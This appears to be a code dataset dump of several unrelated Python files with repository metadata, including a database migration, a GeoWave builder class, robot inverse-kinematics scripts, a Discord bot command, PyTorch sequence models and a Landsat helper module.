"""create_pipeline_offset_table Revision ID: 746f77fcf519 Revises: 63c90017aa5d Create Date: 2020-10-20 13:32:59.329693 """ from alembic import op import sqlalchemy as sa # revision identifiers, used by Alembic. revision = '746f77fcf519' down_revision = '63c90017aa5d' branch_labels = None depends_on = None def upgrade(): op.create_table( 'pipeline_offsets', sa.Column('id', sa.Integer, autoincrement=True, primary_key=True), sa.Column('pipeline_id', sa.Integer, nullable=False), sa.Column('offset', sa.String, nullable=False) ) def downgrade(): op.drop_table('pipeline_offsets')
273
0
46
86ff824699222c69c36860f3f9d1fe253fde8c59
2,791
py
Python
python/src/main/python/pygw/geotools/simple_feature_type_builder.py
jhickman-prominent/geowave
fb421588e22a7c68ef13be1e57bc2c674dd1b090
[ "Apache-2.0" ]
null
null
null
python/src/main/python/pygw/geotools/simple_feature_type_builder.py
jhickman-prominent/geowave
fb421588e22a7c68ef13be1e57bc2c674dd1b090
[ "Apache-2.0" ]
2
2019-09-20T15:39:27.000Z
2019-12-03T14:07:43.000Z
python/src/main/python/pygw/geotools/simple_feature_type_builder.py
jhickman-prominent/geowave
fb421588e22a7c68ef13be1e57bc2c674dd1b090
[ "Apache-2.0" ]
null
null
null
# # Copyright (c) 2013-2019 Contributors to the Eclipse Foundation # # See the NOTICE file distributed with this work for additional information regarding copyright # ownership. All rights reserved. This program and the accompanying materials are made available # under the terms of the Apache License, Version 2.0 which accompanies this distribution and is # available at http://www.apache.org/licenses/LICENSE-2.0.txt #=============================================================================================== from pygw.config import java_pkg from pygw.base import GeoWaveObject from .simple_feature_type import SimpleFeatureType from .attribute_descriptor import AttributeDescriptor class SimpleFeatureTypeBuilder(GeoWaveObject): """ Builds `pygw.geotools.simple_feature_type.SimpleFeatureType` instances. """ def set_name(self, name): """ Sets the name of the feature type. Args: name (str): The name to use. Returns: This feature type builder. """ self._java_ref.setName(name) return self def set_namespace_uri(self, namespace_uri): """ Sets the namespace URI of the feature type. Args: namespace_uri (str): The namespace URI to use. Returns: This feature type builder. """ self._java_ref.setNamespaceURI(namespace_uri) return self def set_srs(self, srs): """ Sets the spatial reference system of the feature type. Args: srs (str): The spatial reference system to use. Returns: This feature type builder. """ self._java_ref.setSRS(srs) return self def add(self, attribute_descriptor): """ Adds an attribute to the feature type. Args: attribute_descriptor (pygw.geotools.attribute_descriptor.AttributeDescriptor): The attribute to add. Returns: This feature type builder. """ if isinstance(attribute_descriptor, AttributeDescriptor): self.attributes.append(attribute_descriptor) self._java_ref.add(attribute_descriptor._java_ref) return self else: raise ValueError("attribute_descriptor should be of type AttributeDescriptor") def build_feature_type(self): """ Builds the configured feature type. Returns: A `pygw.geotools.simple_feature_type.SimpleFeatureType` with the given configuration. """ return SimpleFeatureType(self._java_ref.buildFeatureType(), self.attributes)
32.835294
112
0.638839
# # Copyright (c) 2013-2019 Contributors to the Eclipse Foundation # # See the NOTICE file distributed with this work for additional information regarding copyright # ownership. All rights reserved. This program and the accompanying materials are made available # under the terms of the Apache License, Version 2.0 which accompanies this distribution and is # available at http://www.apache.org/licenses/LICENSE-2.0.txt #=============================================================================================== from pygw.config import java_pkg from pygw.base import GeoWaveObject from .simple_feature_type import SimpleFeatureType from .attribute_descriptor import AttributeDescriptor class SimpleFeatureTypeBuilder(GeoWaveObject): """ Builds `pygw.geotools.simple_feature_type.SimpleFeatureType` instances. """ def __init__(self): self.attributes = [] super().__init__(java_pkg.org.geotools.feature.simple.SimpleFeatureTypeBuilder()) def set_name(self, name): """ Sets the name of the feature type. Args: name (str): The name to use. Returns: This feature type builder. """ self._java_ref.setName(name) return self def set_namespace_uri(self, namespace_uri): """ Sets the namespace URI of the feature type. Args: namespace_uri (str): The namespace URI to use. Returns: This feature type builder. """ self._java_ref.setNamespaceURI(namespace_uri) return self def set_srs(self, srs): """ Sets the spatial reference system of the feature type. Args: srs (str): The spatial reference system to use. Returns: This feature type builder. """ self._java_ref.setSRS(srs) return self def add(self, attribute_descriptor): """ Adds an attribute to the feature type. Args: attribute_descriptor (pygw.geotools.attribute_descriptor.AttributeDescriptor): The attribute to add. Returns: This feature type builder. """ if isinstance(attribute_descriptor, AttributeDescriptor): self.attributes.append(attribute_descriptor) self._java_ref.add(attribute_descriptor._java_ref) return self else: raise ValueError("attribute_descriptor should be of type AttributeDescriptor") def build_feature_type(self): """ Builds the configured feature type. Returns: A `pygw.geotools.simple_feature_type.SimpleFeatureType` with the given configuration. """ return SimpleFeatureType(self._java_ref.buildFeatureType(), self.attributes)
117
0
27
263312b88cc0b035cd76732103e670965aa5d5b7
3,099
py
Python
robots/sc-3dof/src/sc_3dof_manipulate.py
frdedynamics/ik_solver_test
e162080838dca9cdba2c576836acd4a06563db3c
[ "RSA-MD" ]
null
null
null
robots/sc-3dof/src/sc_3dof_manipulate.py
frdedynamics/ik_solver_test
e162080838dca9cdba2c576836acd4a06563db3c
[ "RSA-MD" ]
null
null
null
robots/sc-3dof/src/sc_3dof_manipulate.py
frdedynamics/ik_solver_test
e162080838dca9cdba2c576836acd4a06563db3c
[ "RSA-MD" ]
null
null
null
#!/usr/bin/env python # -*- coding: utf-8 -*- from openravepy import * import sys import numpy as np # initialize environment env = Environment() env.StopSimulation() # openrave_root = './' # env.Load(openrave_root + "baxter_ik.xml") env.Load("sc_3dof.xml") env.SetViewer('qtcoin') # start the viewer (conflicts with matplotlib) robot = env.GetRobots()[0] # get the first robot manip = robot.SetActiveManipulator('manipulator') # set the manipulator to right_arm dummy_joints = [1.57, 0.0, 0.0] robot.SetDOFValues(dummy_joints, manip.GetArmIndices()) # set the current solution current_pose = manip.GetEndEffectorTransform() print current_pose # # try IK for similar pose goal_pose = current_pose # # goal_pose[2,3] -= 0.05 ikmodel = databases.inversekinematics.InverseKinematicsModel(robot,iktype=IkParameterization.Type.Translation3D) print ikmodel.load() # sol = manip.FindIKSolution(goal_pose, 18) # get collision-free solution # print "IK solution:", sol # ikmodel = databases.inversekinematics.InverseKinematicsModel(robot,iktype=IkParameterization.Type.Translation3D) # if not ikmodel.load(): # ikmodel.autogenerate() index = 0 with env: # move the robot in a random collision-free position and call the IK while True: target=ikmodel.manip.GetTransform()[0:3,3]+(np.random.rand(3)-0.5) solutions = ikmodel.manip.FindIKSolutions(IkParameterization(target,IkParameterization.Type.Lookat3D),IkFilterOptions.CheckEnvCollisions) print "index:", index index += 1 if len(solutions) > 0: break raw_input('Hit ENTER to continue.') env.Destroy() with robot: # lock environment and save robot state robot.SetDOFValues([0.0, 0.0, 0.0],[0,1,2]) # set the first 3 dof values Tee = manip.GetEndEffectorTransform() # get end effector print Tee ikparam = IkParameterization(Tee[0:3,3],ikmodel.iktype) # build up the translation3d ik query print ikparam print ikparam.GetType() print ikparam.GetNumberOfValues() print ikparam.GetValues() print ikparam.GetDOF() print ikparam.GetRotation3D() print ikparam.GetTranslation3D() # joint_conf = databases.inversekinematics.RaveCreateIkSolver(env, 'sc_3dof') # print "joint_conf", joint_conf ikmodel = databases.inversekinematics.InverseKinematicsModel(robot, iktype=IkParameterization.Type.Translation3D) ikname = ikmodel.getikname() iktest = ikmodel.testik() print "ikname", ikname sys.exit("Done") sols = manip.FindIKSolutions(ikparam, IkFilterOptions.CheckEnvCollisions) # get all solutions sol = manip.FindIKSolution(goal_pose, 18) # get collision-free solution print sols sys.exit("Done") h = env.plot3(Tee[0:3,3],10) # plot one point with robot: # save robot state for sol in sols[::10]: # go through every 10th solution robot.SetDOFValues(sol,manip.GetArmIndices()) # set the current solution env.UpdatePublishedBodies() # allow viewer to update new robot raw_input('press any key') raveLogInfo('restored dof values: '+repr(robot.GetDOFValues())) # robot state is restored to original
34.054945
141
0.734108
#!/usr/bin/env python # -*- coding: utf-8 -*- from openravepy import * import sys import numpy as np # initialize environment env = Environment() env.StopSimulation() # openrave_root = './' # env.Load(openrave_root + "baxter_ik.xml") env.Load("sc_3dof.xml") env.SetViewer('qtcoin') # start the viewer (conflicts with matplotlib) robot = env.GetRobots()[0] # get the first robot manip = robot.SetActiveManipulator('manipulator') # set the manipulator to right_arm dummy_joints = [1.57, 0.0, 0.0] robot.SetDOFValues(dummy_joints, manip.GetArmIndices()) # set the current solution current_pose = manip.GetEndEffectorTransform() print current_pose # # try IK for similar pose goal_pose = current_pose # # goal_pose[2,3] -= 0.05 ikmodel = databases.inversekinematics.InverseKinematicsModel(robot,iktype=IkParameterization.Type.Translation3D) print ikmodel.load() # sol = manip.FindIKSolution(goal_pose, 18) # get collision-free solution # print "IK solution:", sol # ikmodel = databases.inversekinematics.InverseKinematicsModel(robot,iktype=IkParameterization.Type.Translation3D) # if not ikmodel.load(): # ikmodel.autogenerate() index = 0 with env: # move the robot in a random collision-free position and call the IK while True: target=ikmodel.manip.GetTransform()[0:3,3]+(np.random.rand(3)-0.5) solutions = ikmodel.manip.FindIKSolutions(IkParameterization(target,IkParameterization.Type.Lookat3D),IkFilterOptions.CheckEnvCollisions) print "index:", index index += 1 if len(solutions) > 0: break raw_input('Hit ENTER to continue.') env.Destroy() with robot: # lock environment and save robot state robot.SetDOFValues([0.0, 0.0, 0.0],[0,1,2]) # set the first 3 dof values Tee = manip.GetEndEffectorTransform() # get end effector print Tee ikparam = IkParameterization(Tee[0:3,3],ikmodel.iktype) # build up the translation3d ik query print ikparam print ikparam.GetType() print ikparam.GetNumberOfValues() print ikparam.GetValues() print ikparam.GetDOF() print ikparam.GetRotation3D() print ikparam.GetTranslation3D() # joint_conf = databases.inversekinematics.RaveCreateIkSolver(env, 'sc_3dof') # print "joint_conf", joint_conf ikmodel = databases.inversekinematics.InverseKinematicsModel(robot, iktype=IkParameterization.Type.Translation3D) ikname = ikmodel.getikname() iktest = ikmodel.testik() print "ikname", ikname sys.exit("Done") sols = manip.FindIKSolutions(ikparam, IkFilterOptions.CheckEnvCollisions) # get all solutions sol = manip.FindIKSolution(goal_pose, 18) # get collision-free solution print sols sys.exit("Done") h = env.plot3(Tee[0:3,3],10) # plot one point with robot: # save robot state for sol in sols[::10]: # go through every 10th solution robot.SetDOFValues(sol,manip.GetArmIndices()) # set the current solution env.UpdatePublishedBodies() # allow viewer to update new robot raw_input('press any key') raveLogInfo('restored dof values: '+repr(robot.GetDOFValues())) # robot state is restored to original
0
0
0
e7d0c8fc9a6524561313e97fa779be7c5c6960c4
5,826
py
Python
bot/player_commands/missing.py
UP929312/CommunityBot
c16294e8ff4f47d9a1e8c18c9cd4011e7ebbd67a
[ "Apache-2.0" ]
1
2021-06-15T07:31:13.000Z
2021-06-15T07:31:13.000Z
bot/player_commands/missing.py
UP929312/CommunityBot
c16294e8ff4f47d9a1e8c18c9cd4011e7ebbd67a
[ "Apache-2.0" ]
1
2021-06-01T10:14:32.000Z
2021-06-02T10:54:12.000Z
bot/player_commands/missing.py
UP929312/CommunityBot
c16294e8ff4f47d9a1e8c18c9cd4011e7ebbd67a
[ "Apache-2.0" ]
2
2021-06-01T10:59:15.000Z
2021-06-03T18:29:36.000Z
import discord # type: ignore from discord.ext import commands # type: ignore from discord.commands import Option # type: ignore from typing import Optional import json import requests from utils import error, PROFILE_NAMES, hf, guild_ids from menus import generate_static_preset_menu from emojis import ITEM_RARITY from parse_profile import get_profile_data from extract_ids import extract_internal_names RARITY_LIST = list(ITEM_RARITY.keys()) # Create the master list! from text_files.accessory_list import talisman_upgrades # Get a list of all accessories ACCESSORIES: list[dict] = [] with open("text_files/MASTER_ITEM_DICT.json", "r", encoding="utf-8") as file: item_dict = json.load(file) for item in item_dict: if item_dict[item].get("rarity", False) and item_dict[item]["rarity"] != "UNKNOWN": ACCESSORIES.append(item_dict[item]) # Now remove all the low tier ones MASTER_ACCESSORIES = [] for accessory in ACCESSORIES: if accessory["internal_name"] not in talisman_upgrades.keys(): MASTER_ACCESSORIES.append(accessory) EMOJI_LIST = ["<:alphabetically:905066318720544779>", "<:recombobulator:854750106376339477>", "<:by_price:900069290143797299>"]
50.66087
166
0.650704
import discord # type: ignore from discord.ext import commands # type: ignore from discord.commands import Option # type: ignore from typing import Optional import json import requests from utils import error, PROFILE_NAMES, hf, guild_ids from menus import generate_static_preset_menu from emojis import ITEM_RARITY from parse_profile import get_profile_data from extract_ids import extract_internal_names RARITY_LIST = list(ITEM_RARITY.keys()) # Create the master list! from text_files.accessory_list import talisman_upgrades # Get a list of all accessories ACCESSORIES: list[dict] = [] with open("text_files/MASTER_ITEM_DICT.json", "r", encoding="utf-8") as file: item_dict = json.load(file) for item in item_dict: if item_dict[item].get("rarity", False) and item_dict[item]["rarity"] != "UNKNOWN": ACCESSORIES.append(item_dict[item]) # Now remove all the low tier ones MASTER_ACCESSORIES = [] for accessory in ACCESSORIES: if accessory["internal_name"] not in talisman_upgrades.keys(): MASTER_ACCESSORIES.append(accessory) EMOJI_LIST = ["<:alphabetically:905066318720544779>", "<:recombobulator:854750106376339477>", "<:by_price:900069290143797299>"] class missing_cog(commands.Cog): def __init__(self, bot) -> None: self.client = bot @commands.command(name="missing", aliases=['missing_accessories', 'accessories', 'miss', 'm']) async def missing_command(self, ctx, provided_username: Optional[str] = None, provided_profile: Optional[str] = None) -> None: await self.get_missing(ctx, provided_username, provided_profile, is_response=False) @commands.slash_command(name="missing", description="Gets someone's missing accessories", guild_ids=guild_ids) async def missing_slash(self, ctx, username: Option(str, "username:", required=False), profile: Option(str, "profile", choices=PROFILE_NAMES, required=False)): if not (ctx.channel.permissions_for(ctx.guild.me)).send_messages: return await ctx.respond("You're not allowed to do that here.", ephemeral=True) await self.get_missing(ctx, username, profile, is_response=True) #========================================================================================================================================= async def get_missing(self, ctx, provided_username: Optional[str] = None, provided_profile_name: Optional[str] = None, is_response: bool = False) -> None: player_data: Optional[dict] = await get_profile_data(ctx, provided_username, provided_profile_name, is_response=is_response) if player_data is None: return username = player_data["username"] accessory_bag = player_data.get("talisman_bag", None) inv_content = player_data.get("inv_contents", {"data": []}) if not accessory_bag: return await error(ctx, "Error, could not find this person's accessory bag", "Do they have their API disabled for this command?", is_response=is_response) accessory_bag = extract_internal_names(accessory_bag["data"]) inventory = extract_internal_names(inv_content["data"]) missing = [x for x in MASTER_ACCESSORIES if x["internal_name"] not in accessory_bag+inventory] if not missing: return await error(ctx, f"Completion!", f"{username} already has all accessories!", is_response=is_response) try: lowest_bin_data = requests.get("http://moulberry.codes/lowestbin.json").json() except: return await error(ctx, f"Error, price API is down!", f"Please wait for it to return, and try again later!", is_response=is_response) for accessory in missing: accessory["price"] = lowest_bin_data.get(accessory["internal_name"], 9999999999) list_of_embeds = [] for page, parameter in zip(["alphabetically", "by rarity", "by price"], ["name", "rarity", "price"]): sort_func = lambda x: x[parameter] if parameter != "rarity" else RARITY_LIST.index(x["rarity"]) sorted_accessories = sorted(missing, key=sort_func)[:42] extra = "" if len(missing) <= 36 else f", showing the first {int(len(sorted_accessories)/6)}" embed = discord.Embed(title=f"Missing {len(missing)} accessories for {username}{extra}, sorted: {page}", colour=0x3498DB) def make_embed(embed, acc_list, num): text = "" for item in acc_list: wiki_link = "<Unknown>" if not item['wiki_link'] else f"[wiki]({item['wiki_link']})" price = hf(item['price']) if item['price'] != 9999999999 else 'N/A' text += f"{ITEM_RARITY[item['rarity']]} {item['name']}\n➜ For {price}, link: {wiki_link}\n" embed_title = f"{acc_list[0]['name'][0]}-{acc_list[-1]['name'][0]}" if parameter == "name" else f"Group {num}" embed.add_field(name=f"{embed_title}", value=text, inline=True) if len(sorted_accessories) < 6: # For people with only a few missing make_embed(embed, sorted_accessories, 1) else: list_length = int(len(sorted_accessories)/6) for row in range(6): row_accessories = sorted_accessories[row*list_length:(row+1)*list_length] # Get the first group out of 6 make_embed(embed, row_accessories, row+1) embed.set_footer(text=f"Command executed by {ctx.author.display_name} | Community Bot. By the community, for the community.") list_of_embeds.append(embed) await generate_static_preset_menu(ctx=ctx, list_of_embeds=list_of_embeds, emoji_list=EMOJI_LIST, is_response=is_response)
4,116
484
23
8f765cb99284c504f466ca30e7deb4f59c374dad
3,797
py
Python
model/MyModel.py
seanzhangJM/torch_nlp_job_default
fe9126c4abbde441fcc65d14d42477e4fff9d509
[ "MIT" ]
null
null
null
model/MyModel.py
seanzhangJM/torch_nlp_job_default
fe9126c4abbde441fcc65d14d42477e4fff9d509
[ "MIT" ]
null
null
null
model/MyModel.py
seanzhangJM/torch_nlp_job_default
fe9126c4abbde441fcc65d14d42477e4fff9d509
[ "MIT" ]
null
null
null
#!/usr/bin/env python # _*_ coding: utf-8 _*_ # @Time : 2021/12/27 14:03 # @Author : zhangjianming # @Email : YYDSPanda@163.com # @File : MyModel.py # @Software: PyCharm import torch import torch.nn as nn import torch.nn.functional as F from torch_nlp_job_default.util.log_config import get_logger logger = get_logger() class RNNModel(nn.Module): """循环神经网络模型"""
37.97
114
0.628654
#!/usr/bin/env python # _*_ coding: utf-8 _*_ # @Time : 2021/12/27 14:03 # @Author : zhangjianming # @Email : YYDSPanda@163.com # @File : MyModel.py # @Software: PyCharm import torch import torch.nn as nn import torch.nn.functional as F from torch_nlp_job_default.util.log_config import get_logger logger = get_logger() class RNNModel(nn.Module): """循环神经网络模型""" def __init__(self, rnn_layer, vocab_size, **kwargs): super(RNNModel, self).__init__(**kwargs) self.rnn = rnn_layer self.vocab_size = vocab_size self.num_hiddens = self.rnn.hidden_size # 如果RNN是双向的(之后将介绍),num_directions应该是2,否则应该是1 if not self.rnn.bidirectional: self.num_directions = 1 self.linear = nn.Linear(self.num_hiddens, self.vocab_size) else: self.num_directions = 2 self.linear = nn.Linear(self.num_hiddens * 2, self.vocab_size) def forward(self, inputs, state): # nn.Embedding X = F.one_hot(inputs.T.long(), self.vocab_size) X = X.to(torch.float32) Y, state = self.rnn(X, state) # 全连接层首先将Y的形状改为(时间步数*批量大小,隐藏单元数) # 它的输出形状是(时间步数*批量大小,词表大小)。 output = self.linear(Y.reshape((-1, Y.shape[-1]))) return output, state def begin_state(self, device, batch_size=1): if not isinstance(self.rnn, nn.LSTM): # nn.GRU以张量作为隐状态 return torch.zeros((self.num_directions * self.rnn.num_layers, batch_size, self.num_hiddens), device=device) else: # nn.LSTM以元组作为隐状态 return (torch.zeros(( self.num_directions * self.rnn.num_layers, batch_size, self.num_hiddens), device=device), torch.zeros(( self.num_directions * self.rnn.num_layers, batch_size, self.num_hiddens), device=device)) class Seq2SeqEncoder(nn.Module): def __init__(self, vocab_size, embed_size, num_hiddens, num_layers, dropout=0, **kwargs): super(Seq2SeqEncoder, self).__init__(**kwargs) self.vocab_size = vocab_size self.embed_size = embed_size self.num_hiddens = num_hiddens self.embedding = nn.Embedding(self.vocab_size, self.embed_size) self.rnn = nn.GRU(embed_size, num_hiddens, num_layers=num_layers, dropout=dropout) def forward(self, X): # X shape:[batch_size,time_steps,embed_size] X = self.embedding(X) X = X.permute(1, 0, 2) output, state = self.rnn(X) # output:[time_steps,batch_size,num_hiddens] # state[0]:[2*num_layers,batch_size,num_hiddens] if bidirectional else [num_layers,batch_size,num_hiddens] return output, state class Seq2SeqDecoder(nn.Module): def __init__(self, vocab_size, embed_size, num_hiddens, num_layers, dropout=0, **kwargs): super(Seq2SeqDecoder, self).__init__(**kwargs) self.vocab_size = vocab_size self.embed_size = embed_size self.num_hiddens = num_hiddens self.embedding = nn.Embedding(self.vocab_size, self.embed_size) self.rnn = nn.GRU(embed_size + num_hiddens, num_hiddens, num_layers=num_layers, dropout=dropout) self.dense = nn.Linear(num_hiddens, vocab_size) def init_state(self, enc_outputs, *args): return enc_outputs[1] def forward(self, X, state): X = self.embedding(X) X = X.permute(1, 0, 2) context = state[-1].repeat(X.shape[0], 1, 1) X_and_context = torch.cat((X, context), dim=2) output, state = self.rnn(X_and_context, state) # output shape:[time_steps,batch_size,num_hiddens] output = self.dense(output).permute(1, 0, 2) return output, state
3,302
22
260
7f96ffe28e1306cbb636608c457e89fc1dd8aeb0
1,679
py
Python
molsysmt/_private/exceptions/not_implemented_engine_error.py
uibcdf/MolModMTs
4f6b6f671a9fa3e73008d1e9c48686d5f20a6573
[ "MIT" ]
null
null
null
molsysmt/_private/exceptions/not_implemented_engine_error.py
uibcdf/MolModMTs
4f6b6f671a9fa3e73008d1e9c48686d5f20a6573
[ "MIT" ]
null
null
null
molsysmt/_private/exceptions/not_implemented_engine_error.py
uibcdf/MolModMTs
4f6b6f671a9fa3e73008d1e9c48686d5f20a6573
[ "MIT" ]
null
null
null
class NotImplementedEngineError(NotImplementedError): """Exception raised when executing a method with a specific engine is not supported yet. This exception is raised when a method can not be executed with the selected engine by the user. Parameters ---------- engine : str The engine not supported yet. Raises ------ NotImplementedFormError A message is printed out with the name of the engine not supported, the name of the class or the method raising the exception, the link to the API documentation, and the link to the issues board of Sabueso's GitHub repository. Examples -------- >>> from molsysmt._private.exceptions import NotImplementedEngineError >>> def method_name(engine): ... if engine not in ['MolSysMT', 'MDTraj']: ... raise NotImplementedEngineError(engine) ... pass .. admonition:: See Also :class: attention :ref:`Developer Guide \> Exceptions \> NotImplementedEngineError <developer:exceptions:NotImplementedEngineError>` """
31.092593
122
0.646814
class NotImplementedEngineError(NotImplementedError): """Exception raised when executing a method with a specific engine is not supported yet. This exception is raised when a method can not be executed with the selected engine by the user. Parameters ---------- engine : str The engine not supported yet. Raises ------ NotImplementedFormError A message is printed out with the name of the engine not supported, the name of the class or the method raising the exception, the link to the API documentation, and the link to the issues board of Sabueso's GitHub repository. Examples -------- >>> from molsysmt._private.exceptions import NotImplementedEngineError >>> def method_name(engine): ... if engine not in ['MolSysMT', 'MDTraj']: ... raise NotImplementedEngineError(engine) ... pass .. admonition:: See Also :class: attention :ref:`Developer Guide \> Exceptions \> NotImplementedEngineError <developer:exceptions:NotImplementedEngineError>` """ def __init__(self, syntaxis): from molsysmt import __github_issues_web__ from inspect import stack all_stack_frames = stack() caller_stack_frame = all_stack_frames[1] caller_name = caller_stack_frame[3] api_doc = '' message = ( f"The \"{engine}\" engine in \"{caller_name}\" has not been implemented yet. " f"Check {api_doc} for more information. " f"Write a new issue in {__github_issues_web__} asking for its implementation." ) super().__init__(message)
567
0
27
b9ba88b9235ace559185b77c2db576c890cd1f1b
1,783
py
Python
tests/plugins/test_beautify_icon.py
enricorotundo/folium
c3d21e6a90fbb21dff0a8b0851a835515b156eb8
[ "MIT" ]
10
2019-09-09T15:53:39.000Z
2022-01-15T19:35:41.000Z
tests/plugins/test_beautify_icon.py
enricorotundo/folium
c3d21e6a90fbb21dff0a8b0851a835515b156eb8
[ "MIT" ]
1
2018-10-26T14:07:53.000Z
2018-10-26T14:07:53.000Z
tests/plugins/test_beautify_icon.py
enricorotundo/folium
c3d21e6a90fbb21dff0a8b0851a835515b156eb8
[ "MIT" ]
1
2020-08-03T08:46:26.000Z
2020-08-03T08:46:26.000Z
# -*- coding: utf-8 -*- """ Test BeautifyIcon --------------- """ from __future__ import (absolute_import, division, print_function) from jinja2 import Template import folium from folium import plugins
29.229508
140
0.588334
# -*- coding: utf-8 -*- """ Test BeautifyIcon --------------- """ from __future__ import (absolute_import, division, print_function) from jinja2 import Template import folium from folium import plugins def test_beautify_icon(): m = folium.Map([30., 0.], zoom_start=3) # BeautifyIcons ic1 = plugins.BeautifyIcon( icon='plane', border_color='#b3334f', text_color='#b3334f') ic2 = plugins.BeautifyIcon(border_color='#00ABDC', text_color='#00ABDC', number=10, inner_icon_style='margin-top:0;') # Markers, add icons as keyword argument bm1 = folium.Marker(location=[46, -122], popup='Portland, OR', icon=ic1 ).add_to(m) bm2 = folium.Marker( location=[50, -121], icon=ic2 ).add_to(m) m.add_child(bm1) m.add_child(bm2) m._repr_html_() out = m._parent.render() # We verify that the script import is present. script = '<script src="https://cdn.rawgit.com/marslan390/BeautifyMarker/master/leaflet-beautify-marker-icon.js"></script>' # noqa assert script in out # We verify that the css import is present. css = '<link rel="stylesheet" href="https://cdn.rawgit.com/marslan390/BeautifyMarker/master/leaflet-beautify-marker-icon.css"/>' # noqa assert css in out # We verify that the Beautiful Icons are rendered correctly. tmpl = Template(u""" var {{this.get_name()}} = new L.BeautifyIcon.icon({{ this.options }}) {{this._parent.get_name()}}.setIcon({{this.get_name()}}); """) # noqa assert tmpl.render(this=ic1) in out assert tmpl.render(this=ic2) in out
1,551
0
23
a8f874247ca4e35e657f742398b5bb62716b1a49
1,661
py
Python
models/vgg.py
wangren09/ASK
f4b0f47341a1f2e3fd2a2c20898779fb589c29c5
[ "MIT" ]
54
2021-08-11T08:59:52.000Z
2021-09-29T17:35:53.000Z
models/vgg.py
wangren09/ASK
f4b0f47341a1f2e3fd2a2c20898779fb589c29c5
[ "MIT" ]
null
null
null
models/vgg.py
wangren09/ASK
f4b0f47341a1f2e3fd2a2c20898779fb589c29c5
[ "MIT" ]
13
2021-08-11T23:50:15.000Z
2022-02-27T18:04:08.000Z
import torch.nn as nn
32.568627
86
0.509332
import torch.nn as nn class VGG16(nn.Module): def __init__(self): super(VGG16, self).__init__() cfg1 = [64, 64, 'M'] cfg2 = [128, 128, 'M'] cfg3 = [256, 256, 256, 'M'] cfg4 = [512, 512, 512, 'M'] cfg5 = [512, 512, 512, 'M'] self.layer1 = self._make_layers(cfg1, 3) self.layer2 = self._make_layers(cfg2, 64) self.layer3 = self._make_layers(cfg3, 128) self.layer4 = self._make_layers(cfg4, 256) self.layer5 = self._make_layers(cfg5, 512) self.classifier = nn.Sequential( nn.Flatten(start_dim=1), nn.Dropout(), nn.Linear(512, 512), nn.ReLU(True), nn.Dropout(), nn.Linear(512, 512), nn.ReLU(True), nn.Linear(512, 10), ) def _make_layers(self, cfg, in_channels): layers = [] for x in cfg: if x == 'M': layers += [nn.MaxPool2d(kernel_size=2, stride=2)] else: layers += [nn.Conv2d(in_channels, x, kernel_size=3, padding=1), nn.BatchNorm2d(x), nn.ReLU(inplace=True)] in_channels = x return nn.Sequential(*layers) def forward(self, x, extra_out=None): out1 = self.layer1(x) out2 = self.layer2(out1) out3 = self.layer3(out2) out4 = self.layer4(out3) out5 = self.layer5(out4) out = self.classifier(out5) if extra_out is None: return out else: return [out1, out2, out3, out4, out5][extra_out].flatten(start_dim=1), out
1,533
2
103
1509e1c5188bd7290ad8c4d58170e67abd20cdbe
10,235
py
Python
landsat8/core.py
paddyesch/landsat8
9e5736eed73ad7932c27077220362c6dac70be35
[ "MIT" ]
1
2016-11-24T10:42:57.000Z
2016-11-24T10:42:57.000Z
landsat8/core.py
paddyesch/landsat8
9e5736eed73ad7932c27077220362c6dac70be35
[ "MIT" ]
null
null
null
landsat8/core.py
paddyesch/landsat8
9e5736eed73ad7932c27077220362c6dac70be35
[ "MIT" ]
null
null
null
# MIT License # # Copyright (c) 2016 Patrick Eschenbach # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import urllib import httplib import os import gzip import shutil import random import subprocess import json import time import math from landsat.downloader import Downloader from landsat.image import Simple from colorama import init, Fore init(autoreset=True) work_folder = "temp" def calculate_latlon_midpoint(lat1, lon1, lat2, lon2): "Calculation of geographic midpoint with method A: http://www.geomidpoint.com/calculation.html" lat1 = math.radians(lat1) lon1 = math.radians(lon1) lat2 = math.radians(lat2) lon2 = math.radians(lon2) w1 = 1 w2 = 2 w_total = w1 + w2 x1 = math.cos(lat1) * math.cos(lon1) y1 = math.cos(lat1) * math.sin(lon1) z1 = math.sin(lat1) x2 = math.cos(lat2) * math.cos(lon2) y2 = math.cos(lat2) * math.sin(lon2) z2 = math.sin(lat2) x = ((x1 * w1) + (x2 * w2)) / w_total y = ((y1 * w1) + (y2 * w2)) / w_total z = ((z1 * w1) + (z2 * w2)) / w_total hyp = math.sqrt(x * x + y * y) mid_lat = math.atan2(z, hyp) mid_lon = math.atan2(y, x) return (math.degrees(mid_lat), math.degrees(mid_lon))
37.767528
137
0.669858
# MIT License # # Copyright (c) 2016 Patrick Eschenbach # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import urllib import httplib import os import gzip import shutil import random import subprocess import json import time import math from landsat.downloader import Downloader from landsat.image import Simple from colorama import init, Fore init(autoreset=True) 